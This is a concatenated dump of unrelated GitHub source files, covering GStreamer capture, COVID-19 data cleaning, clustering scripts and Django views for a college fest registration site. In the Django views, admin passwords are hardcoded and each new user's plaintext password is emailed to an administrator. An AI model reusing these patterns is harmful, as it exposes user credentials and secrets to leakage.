1][1])\n","repo_name":"LichAmnesia/LeetCode","sub_path":"python/198.py","file_name":"198.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18511247760","text":"# Ref: https://www.youtube.com/watch?v=HDY8pf-b1nA\n\nimport gi\ngi.require_version('Gst', '1.0')\ngi.require_version('GstApp', '1.0')\nfrom gi.repository import Gst, GstApp, GLib\nfrom threading import Thread\nfrom time import sleep\n\nGst.init()\n\nmain_loop = GLib.MainLoop()\nmain_loop_thread = Thread(target = main_loop.run)\nmain_loop_thread.start()\n\npipeline = Gst.parse_launch('v4l2src ! decodebin ! videoconvert ! appsink name=sink')\nappsink = pipeline.get_by_name('sink')\n\npipeline.set_state(Gst.State.PLAYING)\n\n# Wait to give enough time for pipeline to startup\n\ntry:\n while True:\n # Try to pull a sample within a second, if not give up\n sample = appsink.try_pull_sample(Gst.SECOND)\n if sample is None:\n continue\n\n print (\"I've got a sample!\")\nexcept KeyboardInterrupt:\n # Ctrl C to stop this app\n pass\n\npipeline.set_state(Gst.State.NULL)\nmain_loop.quit()\nmain_loop_thread.join()","repo_name":"digitallyamar/gst-basics","sub_path":"appsink_demo.py","file_name":"appsink_demo.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43072545438","text":"import pandas as pd\nimport numpy as np\nimport math\n\ndef drop_china_data():\n df = pd.read_csv('../DXY-COVID-19-Data/csv/DXYArea.csv')\n df = df[['continentEnglishName','countryName','countryEnglishName','provinceName','provinceEnglishName',\n 'province_confirmedCount','province_suspectedCount','province_curedCount','province_deadCount',\n 'cityName','cityEnglishName','city_confirmedCount','city_suspectedCount','city_curedCount','city_deadCount',\n 'updateTime']]\n df_woc = df[df.countryName != '中国']\n df_china = df[df.countryName == '中国']\n df_with_china = df[df.countryName == df.provinceName]\n df_woc['updateTime'] = df_woc['updateTime'].apply(lambda x:x.split()[0])\n df_china['updateTime'] = df_china['updateTime'].apply(lambda x: x.split()[0])\n df_with_china['updateTime'] = df_with_china['updateTime'].apply(lambda x: x.split()[0])\n df_china.to_csv('csv/data_china.csv')\n df_woc.to_csv('csv/data_without_china.csv')\n df_with_china.to_csv('csv/data_with_china.csv')\n return df_woc, df_china, df_with_china\n\ndef data_each_day_without_china(df_woc,date_name):\n # date_name = np.array(list(df_woc['updateTime']))\n # date_name = np.unique(date_name)\n for name in date_name:\n df_woc[df_woc.updateTime == name].drop_duplicates(subset=\"countryName\").drop(columns = ['updateTime']).to_csv('csv/date/'+name+'.csv')\n\n\ndef data_of_each_country(df_woc,date_name,china_confirmedCount , china_curedCount , china_deadCount):\n data_province_confirmedCount, data_province_deadCount , data_province_curedCount,data_province_confirmedCount_perMillion= [] ,[] ,[],[]\n country_name = np.array(list(df_woc['countryName']))\n country_name_ = df_woc[['countryName','countryEnglishName']].drop_duplicates(subset=['countryEnglishName'])\n\n # for index , row in country_name_.iterrows():\n # print(row['countryName'],row['countryEnglishName'])\n country_name = np.unique(country_name)\n\n tmp_name = np.insert(date_name,0,'Flag')\n tmp_name = np.insert(tmp_name, 0, 'Population')\n tmp_name = np.insert(tmp_name,0,'Name')\n tmp_name = np.insert(tmp_name, 0, 'English Name')\n\n # for name in country_name:\n dic_name,dic_flag = {},{}\n flag = pd.read_csv('csv/flag.csv')\n for index, row in flag.iterrows():\n flag_, country_name,countryEnglishName = row['Flag'], row['Name'],row['countryEnglishName']\n dic_name[country_name] = countryEnglishName\n dic_flag[country_name] = flag_\n\n dic_population = {}\n population = pd.read_csv('csv/population.csv')\n for index, row in population.iterrows():\n population_, country_name = row['Population'], row['Country']\n dic_population[country_name] = population_\n # print(dic_population)\n\n days = len(date_name)\n for index, row in country_name_.iterrows():\n name,English_name = row['countryName'],row['countryEnglishName']\n df_country = df_woc[df_woc.countryName == name].drop_duplicates(subset=\"updateTime\")\n # print (df_country)\n df_country.to_csv('csv/country/'+name+'.csv')\n\n dic_province_confirmedCount , dic_province_deadCount, dic_province_curedCount = dict.fromkeys(date_name,0),dict.fromkeys(date_name,0),dict.fromkeys(date_name,0)\n for index, row in df_country.iterrows():\n dic_province_confirmedCount[row['updateTime']] = row['province_confirmedCount']\n\n\n for index, row in df_country.iterrows():\n dic_province_deadCount[row['updateTime']] = row['province_deadCount']\n\n\n for index, row in df_country.iterrows():\n dic_province_curedCount[row['updateTime']] = row['province_curedCount']\n\n country_flag = None\n if name in dic_flag:\n country_flag = dic_flag[name]\n if type(English_name) != type('a'):\n if name in dic_name:\n English_name = dic_name[name]\n\n country_population = None\n if English_name in dic_population:\n country_population = int(dic_population[English_name].replace(',', ''))\n\n if country_population == None:\n millions = 1\n elif country_population < 1000000:\n millions = 1\n else:\n millions = country_population/1000000\n # print (millions)\n data_province_confirmedCount.append([English_name]+[name]+[country_population] +[country_flag]+ [dic_province_confirmedCount[key] for key in dic_province_confirmedCount])\n data_province_deadCount.append([English_name] + [name] +[country_population]+ [country_flag] + [dic_province_deadCount[key] for key in dic_province_deadCount])\n data_province_curedCount.append([English_name] + [name] +[country_population]+ [country_flag] + [dic_province_curedCount[key] for key in dic_province_curedCount])\n data_province_confirmedCount_perMillion.append([English_name]+[name]+[country_population] +[country_flag]+ [(dic_province_confirmedCount[key]/millions) for key in dic_province_confirmedCount])\n\n\n data_province_confirmedCount.append(['China'] + ['中国'] + [1439323776]+['https://www.countryflags.io/cn/flat/64.png'] +list(china_confirmedCount[len(china_confirmedCount)-days:]))\n data_province_deadCount.append(['China'] + ['中国'] + [1439323776]+['https://www.countryflags.io/cn/flat/64.png'] +list(china_deadCount[len(china_deadCount)-days:]))\n data_province_curedCount.append(['China'] + ['中国'] + [1439323776]+['https://www.countryflags.io/cn/flat/64.png'] +list(china_curedCount[len(china_curedCount)-days:]))\n data_province_confirmedCount_perMillion.append(['China'] + ['中国'] + [1439323776]+['https://www.countryflags.io/cn/flat/64.png'] +list(china_confirmedCount[len(china_confirmedCount)-days:]/1439323776*1000000))\n\n df_total_confirmed_case = pd.DataFrame(data_province_confirmedCount,columns= tmp_name)\n df_total_confirmed_case.to_csv('csv/global/total_confirmed_case.csv')\n\n df_total_deadCount = pd.DataFrame(data_province_deadCount, columns=tmp_name)\n df_total_deadCount.to_csv('csv/global/total_deadCount.csv')\n\n df_total_cured = pd.DataFrame(data_province_curedCount, columns=tmp_name)\n df_total_cured.to_csv('csv/global/total_curedCount.csv')\n\n df_total_confirmed_perMillion = pd.DataFrame(data_province_confirmedCount_perMillion, columns=tmp_name)\n df_total_confirmed_perMillion.to_csv('csv/global/total_confirmed_case_perMillion.csv')\n\n\ndef data_each_day_china(df_china,date_name):\n for name in date_name:\n df_china[df_china.updateTime == name].drop_duplicates(subset=\"provinceName\").drop(columns = ['cityName','cityEnglishName','city_confirmedCount','city_suspectedCount','city_curedCount','city_deadCount',\n 'updateTime']).to_csv('csv/data_china/'+name+'.csv')\n\ndef data_china(date_name):\n df = pd.read_csv('csv/china.csv')\n total_confirmedCount = list(df['total_confirmedCount'])\n total_confirmedCount.reverse()\n\n total_curedCount = list(df['total_curedCount'])\n total_curedCount.reverse()\n\n total_deadCount = list(df['deadCount'])\n total_deadCount.reverse()\n\n return np.asarray(total_confirmedCount),np.asarray(total_curedCount),np.asarray(total_deadCount)\n\n\ndef data_usa_states():\n\n df = pd.read_csv('../covid-19-usa-by-state/COVID-19-Cases-USA-By-State.csv')\n dic_ = {}\n for index,row in df.iterrows():\n dic_[row['State']] = row.iloc[-1]\n\n df = pd.read_csv('csv/US/data_by_states.csv')\n\n df_ = pd.DataFrame(columns=['State','Total Confirmed','Current Confirmed','Total Cured','Total Death','Geometry'])\n for index,row in df.iterrows():\n # print(row)\n row['Total Confirmed'] = dic_[row['State']]\n df_.loc[index] = row\n df_.to_csv('csv/US/data_by_states.csv')\n\ndef data_world():\n df = pd.read_csv('csv/Global/total_confirmed_case.csv')\n dic_ = {}\n for index, row in df.iterrows():\n dic_[row['English Na']] = row.iloc[-1]\n # print (dic_)\n df = pd.read_csv('csv/Global/data_world.csv')\n df_ = pd.DataFrame(\n columns=['Name', 'Confirmed', 'Cured', 'Death', 'Geometry'])\n\n for index, row in df.iterrows():\n if row['Name'] in dic_:\n row['Confirmed'] = dic_[row['Name']]\n df_.loc[index] = row\n else:\n row['Confirmed'] = 'Unknown'\n df_.loc[index] = row\n\n df_.to_csv('csv/Global/data_by_countries.csv')\n\ndef data_EU():\n df = pd.read_csv('csv/Global/total_confirmed_case.csv')\n dic_ = {}\n for index, row in df.iterrows():\n dic_[row['English Na']] = row.iloc[-1]\n # print(dic_)\n df = pd.read_csv('csv/Global/data_EU.csv')\n df_ = pd.DataFrame(\n columns=['Name', 'Confirmed', 'Cured', 'Death', 'Geometry'])\n\n for index, row in df.iterrows():\n if row['Name'] in dic_:\n row['Confirmed'] = dic_[row['Name']]\n df_.loc[index] = row\n else:\n row['Confirmed'] = 'Unknown'\n df_.loc[index] = row\n\n df_.to_csv('csv/Global/data_by_countries_EU.csv')\nif __name__ == \"__main__\":\n # df_woc, df_china ,df_with_china= drop_china_data()\n #\n # date_name = np.array(list(df_woc['updateTime']))\n # date_name = np.unique(date_name)\n #\n # data_each_day_without_china(df_woc,date_name)\n # data_each_day_without_china(df_with_china,date_name)\n # data_each_day_china(df_china, date_name)\n # china_confirmedCount , china_curedCount , china_deadCount= data_china(date_name)\n # data_of_each_country(df_woc,date_name,china_confirmedCount , china_curedCount , china_deadCount)\n # data_usa_states()\n data_world()\n data_EU()\n\n","repo_name":"chedana/COVID-19","sub_path":"COVID-19 data cleaning.py","file_name":"COVID-19 data cleaning.py","file_ext":"py","file_size_in_byte":9586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32336994844","text":"import random\n# 3119222\n\nfu_data = open(r'F:\\Corpus_Set\\restaurant\\test\\neu_new.txt', 'rb')\nfu_train = open(r'F:\\Corpus_Set\\restaurant\\test\\neu_end.txt', 'wb')\n\n# for line in fu_data:\n# count += 1\n# print count\n\nneu_list = random.sample(range(3119222), 2000)\nneu_list.sort()\n\nneu_dict = dict([(word, i) for i, word in enumerate(neu_list)])\n\n\n\n\nfor i in range(3119222):\n line = fu_data.readline()\n if i in neu_dict:\n fu_train.write(line)\n","repo_name":"xk503775229/helloWorld","sub_path":"made_test_neu.py","file_name":"made_test_neu.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10589025416","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport random\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import silhouette_samples,silhouette_score\n\nnpc = np.load('/home/t630/Voltage_Control/data/2015AGC/numpy_data/npwithoutnan2.npy')\nuselesslist = [18,21,22,27,34,43,44,53,56,57,58]\nl = []\nfor i in range(1,58):\n if i not in uselesslist:\n l.append(i)\ndf_names = pd.read_excel('/home/t630/Voltage_Control/data/2015AGC/0场站名称.xlsx',header=None)\npdc = pd.DataFrame(npc)\nl_capacity = []\nfor i in l:\n l_capacity.append(round(df_names[4][i-1],1))\n\n\nnpc_c = npc[:,1:].T\nnpc_c = npc_c/np.array(l_capacity).reshape((47,1))\nnpc_c_mean = np.mean(npc_c,axis = 1)\nnpc_c = npc_c - npc_c_mean.reshape((47,1))\nkmeans = KMeans(n_clusters=8,max_iter=30000,n_jobs = 8)\nkmeans.fit(npc_c)\nprint(kmeans.labels_)\nprint(kmeans.inertia_)\nprint(silhouette_score(npc_c+npc_c_mean.reshape((47,1)), kmeans.labels_))\n\n'''\n# tsne to plot\nfrom sklearn.manifold import TSNE\ntsne = TSNE()\nnpc_tsne = tsne.fit_transform(npc_c)\ncolor_list = ['k^','r*','mo','y>','g*','co','bo','b<']\nfor i in range(47):\n plt.plot(npc_tsne[i,0],npc_tsne[i,1],color_list[kmeans.labels_[i]])\nplt.show()\n\nlabels = kmeans.labels_\n#plot after cluster\nnumtoplot = 2000\nplt.figure()\nfor i in range(47):\n plt.plot(range(numtoplot),npc[:numtoplot,i+1]/npc[:numtoplot,i+1].max())\nplt.show()\n\n\nfor i in range(8):\n plt.figure()\n for j in np.where(labels==i):\n plt.plot(range(numtoplot),npc[:numtoplot,j+1]/npc[:numtoplot,j+1].max())\n plt.title('cluster: '+str(i))\n plt.show()\n \n \n\n \n# talking about the numbers to clusters\nc_inertias = []\nfor i in range(2,20):\n kmeansi = KMeans(n_clusters=i,max_iter=3000,n_jobs=8)\n kmeansi.fit(npc_c)\n #print(kmeansi.labels_)\n #print(kmeansi.inertia_)\n print(silhouette_score(npc_c,kmeansi.labels_))\n c_inertias.append(kmeansi.inertia_)\nplt.plot(range(2,20),c_inertias)\n\n\n\n\n\n\n\n#********降维**************\n#random select\nn,m = npc.shape\nallindex = range(n)\nrandom.shuffle(allindex)\nnumtoselect = 1000\nselectindex = allindex[:1000]\nselectindex.sort()\nnpc_s = npc[selectindex,:]\nnpc_s = npc_s[:,1:]\nfor i in range(47):\n plt.figure()\n plt.plot(range(numtoselect),npc_s[:,i]/npc_s[:,i].max())\n plt.title(str(i))\n plt.show()\n\nnpc_sc = npc_s.T\nnpc_sc = npc_sc/np.array(l_capacity).reshape((47,1))\nnpc_sc_mean = np.mean(npc_sc,axis = 1)\nnpc_sc = npc_sc - npc_sc_mean.reshape((47,1))\nkmeans_rs = KMeans(n_clusters=8,max_iter=30000,n_jobs = 8)\nkmeans_rs.fit(npc_sc)\nprint(kmeans_rs.labels_)\nprint(kmeans_rs.inertia_)\n'''\n#PCA\npca = PCA(n_components = 10)\npca.fit(npc_c)\nnpc_pca = pca.transform(npc_c)\nkmeans_pca = KMeans(n_clusters=8,max_iter=30000,n_jobs = 8)\nkmeans_pca.fit(npc_pca)\nlabels = kmeans_pca.labels_\nfor i in range(8):\n plt.figure()\n for j in np.where(labels==i):\n plt.plot(range(numtoplot),npc[:numtoplot,j+1]/npc[:numtoplot,j+1].max())\n plt.title('cluster: '+str(i))\n plt.show()\nnpc_inverse = pca.inverse_transform(npc_pca)\nnpc_inverse = npc_inverse+npc_c_mean.reshape((47,1))\nnpc_inverse = npc_inverse*np.array(l_capacity).reshape((47,1))\nfor i in range(47):\n plt.figure()\n plt.plot(range(numtoplot),npc[:numtoplot,i+1]/npc[:numtoplot,i+1].max())\n plt.plot(range(numtoplot),npc_inverse[i,:numtoplot]/npc_inverse[i,:numtoplot].max())\n plt.title('cluster: '+str(i))\n plt.show()\n\n\n\n\n\n\n","repo_name":"zyj0704033/Voltage_Control","sub_path":"data_mining/wind_farm_cluster.py","file_name":"wind_farm_cluster.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5877759596","text":"from django.http import Http404\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom django.views.generic import TemplateView\nfrom .models import *\nfrom user.models import *\nfrom django.contrib.auth.models import User, UserManager\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.http import JsonResponse\nfrom django.shortcuts import redirect\nfrom django.utils.crypto import get_random_string\nfrom django.core.mail import send_mail\nfrom questionnaire.models import *\nimport csv\n\nadmin_email = ['ruinedwrath@gmail.com','events@shilpiitbhu.org','eventsteam@shilpiitbhu.org']\nadmin_password = ['shilp2018','eventsshilp','teamstark']\n\ndef index(request):\n\tcontext = {}\n\tif not request.user.is_authenticated:\n\t\tcontext['if_auth'] = False\n\telse :\n\t\tcontext['if_auth'] = True\n\n\treturn render(request,'homepage/index.html',context)\n\ndef indiv(request,event_name):\n\n\t\n\tif len(event_name) > 3:\n\t\tevent_name = event_name.title().replace('_',' ')\n\t\n\tif event_name == 'Icreate':\n\t\tevent_name = 'iCreate'\n\n\tif event_name == 'Automobile And Ic Engine Design':\n\t\tevent_name = 'Automobile and IC Engine Design'\n\n\tif event_name == 'Robotics And Iot':\n\t\tevent_name = 'Robotics and IOT'\n\tcurrEvent = Event.objects.filter(name = event_name)\n\tfor event in currEvent:\n\t\tcurrEvent = event\n\t\teventDetails = event.detail_set.all()\n\t\tdetailsList = []\n\t\tfor details in eventDetails:\n\t\t\tdetailsList.append(details.detail)\n\n\tcontext = {'detailsList':detailsList,'event':currEvent}\n\tif not request.user.is_authenticated:\n\t\tcontext['if_auth'] = False\n\telse :\n\t\tcontext['if_auth'] = True\n\treturn render(request, 'homepage/individual-event.html',context)\n\ndef sign_in(request):\n\n\tif request.user.is_authenticated:\n\t\ttry:\n\t\t\tcurrUser = request.user\n\t\t\tuserProfile = currUser.profiles\n\t\t\treturn redirect(\"/dashboard\")\n\t\texcept:\n\t\t\tlogout(request)\n\t\t\treturn render(request,'homepage/login.html',{'error':\"You are trying to login with the Questionnaire Portal Team ID. For Round 2, both members need to indivdually sign up again on the website.\"})\n\n\t#request.POST['dob']\t\n\tif 'dob' in request.POST.keys():\n\t\treturn sign_up(request)\n\n\tif 'username' in request.POST.keys():\n\t\ttry:\n\t\t\tusername = request.POST['username']\n\t\t\tpassword = request.POST['password']\n\t\t\tcurrUser = authenticate(request, username=username, password=password)\n\t\t\tlogin(request,currUser)\n\t\t\treturn redirect('/dashboard')\t\t\t\t\n\t\texcept:\t\t\n\t\t\treturn render(request,'homepage/login.html',{'error':\"Username and Password do not match Or your account is not verified\"})\n\t\n\treturn render(request, 'homepage/login.html')\n\ndef sign_up(request):\n\t\n\n\tusername = request.POST['username']\n\tpassword = request.POST['password']\n\temail = request.POST['email']\n\t#return HttpResponse(email)\n\ttry:\n\t\tcurrUser = User.objects.create_user(username=email, email=email, password=password)\n\t\tcurrUser.is_active = False\n\t\t\t\n\texcept:\n\t\treturn render(request,'homepage/login.html',{'signup_error':\"This Email Id is already registered\"})\n\t\n\tprofile = Profiles()\n\tprofile.user = currUser\n\tprofile.name = username\n\tprofile.mobile_no = request.POST['phone']\n\tprofile.college_name = request.POST['college']\n\tprofile.year = request.POST['year']\n\tprofile.course = request.POST['class']\n\tprofile.sex = request.POST['sex']\n\tprofile.dob = request.POST['dob'] +'-'+ request.POST['birthday_month'] +'-'+ request.POST['birthday_year'] \n\tprofile.residential_address = \"\"\n\tprofile.confirmation_code = get_random_string(length=32)\n\tprofile.num_events = 0\n\tprofile.payment_plan = \"N/A\"\n\tif email[-12:] == \"iitbhu.ac.in\" or email[-11:] == \"itbhu.ac.in\":\n\t\tprofile.num_events = 8\n\t\tprofile.payment_plan = \"Freshers\"\n\t\tprofile.payment_verified = True\n\t\tprofile.txid_submitted = True\n\t\tprofile.accomodation = True\n\t\tprofile.plan_locked = True\n\t\tprofile.money = 0\n\tprofile.ca_name= request.POST['ca-name']\n\tprofile.save()\n\tprofile.shilpid = \"SH100\"+str(profile.pk)\n\tprofile.save()\n\ttitle = \"New Registrant\"\n\tcontent = \"Hello, A new user has signed up\\n\\n The details are as below:\\n\\n\"\n\tcontent1 = \"\\nEmail id : \"+ email\n\tcontent2 = \"\\nName : \" + profile.name + \"\\nPassword: \" + password\n\tcontent3 = \"\\nShilpid : \" + profile.shilpid\n\tcontent4 = \"\\nMobile no : \"+ profile.mobile_no\n\tcontent5 = \"\\nCollege :\" + profile.college_name\n\tcontent6 = \"\\nClass and year : \" + profile.course + \",\\nyear \"+profile.year\n\tcontent7 = \"\\nCA name: \"+ profile.ca_name\n\tcontent6 = content6+content7\n\tadmin_email1 = 'shilpshobhit2018@gmail.com'\n\tadmin_email2 = 'ruinedwrath@gmail.com'\n\tcontent = content+content1 + content2 + content3 + content4 + content5 + content6\n\tsend_mail(title, content, 'admin@shilpiitbhu.org',[admin_email1], fail_silently=True)\n\t#send_mail(title, content, 'admin@shilpiitbhu.org',[admin_email2], fail_silently=False)\n\n\n\tcurrUser.save()\n\ttry:\n\t\tsend_registration_confirmation(currUser)\n\texcept:\n\t\treturn render(request,'homepage/login.html',{'redirect':\"Error!!! An email has been sent to your registered email for verification\"})\n\n\t#login(request,currUser)\n\treturn render(request,'homepage/login.html',{'redirect':\"Congratulations!!! An email has been sent to your registered email for verification\"})\n\ndef send_registration_confirmation(user):\n\tp = user.profiles\n\ttitle = \"Registration successful for Shilp 2018\"\n\tcontent_url = \"www.shilpiitbhu.org/confirmation/\" + p.shilpid + \"/\" + str(p.confirmation_code)\n\n\tcontent1 = \"Hello \" + p.name + \",\\n\\nGreetings from Team Shilp!\\n\\nWe are happy to inform you that you have successfully registered for Shilp'18.\"\n\tcontent2 = \"\\nClick on the following link to verify your account:\\n\"\n\tcontent3 = content_url\n\tcontent4 = \"\\n\\nFeel free to explore our website for further details and select the participation package as per your preferences.\"\n\tcontent5 = \"\\n\\nIn case you have any queries, feel free to contact us, we'll be happy to help you!\\n\"\n\tcontent6 = \"\\n\\nBest Wishes,\\nTeam Shilp\\nIIT(BHU) Varanasi.\"\n\n\tcontent = content1 + content2 + content3 + content4 + content5 + content6\n\tsend_mail(title, content, 'admin@shilpiitbhu.org', [user.email], fail_silently=True)\n\ndef confirm(request, username, confirmation_code):\n\t\n\t\tprofile = Profiles.objects.get(shilpid = username)\n\t\tuser = profile.user\n\t\tif profile.confirmation_code == confirmation_code and confirmation_code != '-1':\n\t\t\tprofile.confirmation_code = \"-1\"\n\t\t\tuser.is_active = True\n\t\t\tuser.save()\n\t\t\tlogin(request,user)\n\t\treturn redirect(\"/dashboard/RegPlan/\")\n\t\n\ndef allevents(request):\n\tcontext = {}\n\tif not request.user.is_authenticated:\n\t\tcontext['if_auth'] = False\n\telse :\n\t\tcontext['if_auth'] = True\n\n\treturn render(request,'homepage/allevents.html',context)\n\ndef hospi(request):\n\tcontext = {}\n\tif not request.user.is_authenticated:\n\t\tcontext['if_auth'] = False\n\telse :\n\t\tcontext['if_auth'] = True\n\n\treturn render(request,'homepage/hospitality.html',context)\n\ndef dashboard(request):\n\treturn render(request,'homepage/allevents.html')\n\ndef team(request):\n\tcontext = {}\n\tif not request.user.is_authenticated:\n\t\tcontext['if_auth'] = False\n\telse :\n\t\tcontext['if_auth'] = True\n\n\treturn render(request,'homepage/team.html',context)\n\t\ndef signout(request):\n\tlogout(request)\n\treturn redirect('/')\n\ndef download_users(request):\n\n\tif not request.user.is_staff:\n\t\treturn HttpResponse(\"Permission Denied\")\n\n\tresponse = HttpResponse(content_type='text/csv')\n\tresponse['Content-Disposition'] = 'attachment; filename=\"user_registrations.csv\"'\n\tall_users = Profiles.objects.all()\n\twriter = csv.writer(response)\n\trow = ['S No.','email']\n\ti=0\n\tfor item in all_users:\n\t if i==0:\n\t for attrib,value in item.__dict__.items():\n\t if attrib != 'user_id' and attrib !='_state' and attrib !='id':\n\t row.append(attrib.title().replace('_',' '))\n\t writer.writerow(row)\n\t i=i+1\n\t row = [i]\n\t row.append(item.user.email)\n\t for attrib,value in item.__dict__.items():\n\t if attrib != 'user_id' and attrib != '_state' and attrib !='id':\n\t row.append(value)\n\t writer.writerow(row)\n\treturn response\n\ndef download_hospi(request):\n\n\tif not request.user.is_staff:\n\t\treturn HttpResponse(\"Permission Denied\")\n\n\tresponse = HttpResponse(content_type='text/csv')\n\tresponse['Content-Disposition'] = 'attachment; filename=\"accod_registrations.csv\"'\n\tall_users = Profiles.objects.all()\n\twriter = csv.writer(response)\n\trow = ['S No.']\n\ti=0\n\n\tfor item in all_users:\n\t\tw_flag=0\n\t\tif i==0:\n\t\t\tfor attrib,value in item.__dict__.items():\n\t\t\t\tif attrib == 'name' and attrib == 'mobile_no' and attrib == 'sex' and attrib == 'shilpid'and attrib == 'payment_verified' and attrib == 'name' and attrib == 'payment_plan' :\n\t\t\t\t\trow.append(attrib.title().replace('_',' '))\n\t\t\trow.append('Workshop')\n\t\t\twriter.writerow(row)\n\t\ti=i+1\n\t\trow = [i]\n\t\tfor attrib,value in item.__dict__.items():\n\t\t\tif attrib == 'name' and attrib == 'mobile_no' and attrib == 'sex' and attrib == 'shilpid'and attrib == 'payment_verified' and attrib == 'name' and attrib == 'payment_plan' :\n\t\t\t\tif attrib == 'accomodation':\n\t\t\t\t\tif value == True:\n\t\t\t\t\t\tw_flag=1\n\t\t\t\tif w_flag == 1:\n\t\t\t\t\tif attrib == 'payment_plan':\n\t\t\t\t\t\tif value == \"Workshop Accomodation (1 day)\" or value == \"Workshop Accomodation (2 day)\" or value == \"Workshop Accomodation (3 day)\" :\n\t\t\t\t\t\t\tworkshop=\"Yes\"\n\t\t\t\t\t\telse:\t\n\t\t\t\t\t\t\tworkshop=\"No\"\n\n\t\t\t\t\trow.append(value)\n\t\tif w_flag == 1:\n\t\t\trow.append(workshop)\n\t\twriter.writerow(row)\n\treturn response\n\ndef download_quiz(request):\n\n\tif not request.user.is_staff:\n\t\treturn HttpResponse(\"Permission Denied\")\n\n\tresponse = HttpResponse(content_type='text/csv')\n\tresponse['Content-Disposition'] = 'attachment; filename=\"quiz_registrations.csv\"'\n\tall_teams = Quiz_Team.objects.all()\n\twriter = csv.writer(response)\n\trow = ['S No.']\n\ti=0\n\tfor item in all_teams:\n\t\tif i==0:\n\t\t\tfor attrib,value in item.__dict__.items():\n\t\t\t\tif attrib != '_state' and attrib != 'password' :\n\t\t\t\t\trow.append(attrib.title().replace('_',' '))\n\t\t\trow.append('Internal')\n\t\t\twriter.writerow(row)\n\t\ti=i+1\n\t\trow = [i]\n\t\tfor attrib,value in item.__dict__.items():\n\t\t\tif attrib != '_state' and attrib != 'password' :\n\t\t\t\tif attrib == 'leader_email':\n\t\t\t\t\tif value[-12:] == \"iitbhu.ac.in\" or value[-11:] == \"itbhu.ac.in\":\n\t\t\t\t\t\tinternal=\"Yes\"\n\t\t\t\t\telse:\t\n\t\t\t\t\t\tinternal=\"No\"\n\n\t\t\t\trow.append(value)\n\t\trow.append(internal)\n\t\twriter.writerow(row)\n\treturn response\n\ndef get_teams(request,event):\n\tif not request.user.is_staff:\n\t\treturn HttpResponse(\"Permission Denied\")\n\n\tresponse = HttpResponse(content_type='text/csv')\n\tresponse['Content-Disposition'] = 'attachment; filename=\"quiz_registrations.csv\"'\n\tall_teams = Team.objects.all()\n\twriter = csv.writer(response)\n\trow = ['S No.']\n\ti=0\n\tevent = event.title().replace('_',' ')\n\tfor item in all_teams:\n\t\tif item.event != event:\n\t\t\tcontinue\n\t\ttry:\n\t\t\tleader = Profiles.objects.get(shilpid=item.member1)\n\t\t\tif i==0:\n\t\t\t\tfor attrib,value in item.__dict__.items():\n\t\t\t\t\tif attrib != '_state' and attrib != 'password' :\n\t\t\t\t\t\trow.append(attrib.title().replace('_',' '))\n\t\t\t\trow.append(\"Leader Name\")\n\t\t\t\trow.append(\"Leader Email\")\n\t\t\t\trow.append(\"Leader Contact Number\")\n\t\t\t\twriter.writerow(row)\n\t\t\ti=i+1\n\t\t\trow = [i]\n\t\t\tfor attrib,value in item.__dict__.items():\n\t\t\t\tif attrib != '_state' and attrib != 'password' :\n\t\t\t\t\tif attrib == 'leader_email':\n\t\t\t\t\t\tif value[-12:] == \"iitbhu.ac.in\" or value[-11:] == \"itbhu.ac.in\":\n\t\t\t\t\t\t\tinternal=\"Yes\"\n\t\t\t\t\t\telse:\t\n\t\t\t\t\t\t\tinternal=\"No\"\n\n\t\t\t\t\trow.append(value)\n\t\t\trow.append(leader.name)\n\t\t\trow.append(leader.user.email)\n\t\t\trow.append(leader.mobile_no)\n\t\t\twriter.writerow(row)\n\t\texcept:\n\t\t\tc=0\n\treturn response\n","repo_name":"vivekiitbhu/shilp18","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33770797220","text":"import numpy as np\nimport argparse\n\n\ndef extract_vectors(input_file, output_file, dim):\n '''this function takes the name of the input, output files, and the expected length of feature-vector and \\\n creats a file of only vectors for each paragraph'''\n\n vector_list=[]\n with open(input_file, 'r') as f:\n for line in f:\n line_sp=line.rsplit()\n vector=line_sp[-dim:]\n vector = np.array([float(x) for x in vector])\n vector_list.append(vector)\n\n vector_np = np.array(vector_list)\n\n np.savetxt(output_file, vector_np)\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--input', help=\"the file with paragraph+vector(s)\", default=\"out.txt\")\n parser.add_argument('--output', help=\"the file with only vectors\", default=\"vector_results.txt\")\n parser.add_argument('--dim', help='dimensions of the wordvec', default=100)\n args = parser.parse_args()\n extract_vectors(input_file=args.input, output_file=args.output, dim=int(args.dim))\n","repo_name":"teaxhaferi91/simple-fasttext-example","sub_path":"Create_Results.py","file_name":"Create_Results.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42806935017","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom payapp.models import PayRequest, Transaction\nfrom django.contrib import messages\nfrom register.models import CustomUser\nfrom decimal import Decimal\nimport requests\nfrom currencyapi.serializers import ConvertedCurrencySerializer\nfrom currencyapi.models import ConvertedCurrency\nfrom django.db import transaction\nfrom django.utils import timezone\nfrom django.http import JsonResponse\nfrom .models import Notification\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n@login_required\ndef pending_requests(request):\n user = request.user\n received_requests = PayRequest.objects.filter(recipient=user)\n context = {\n 'received_requests': received_requests,\n }\n return 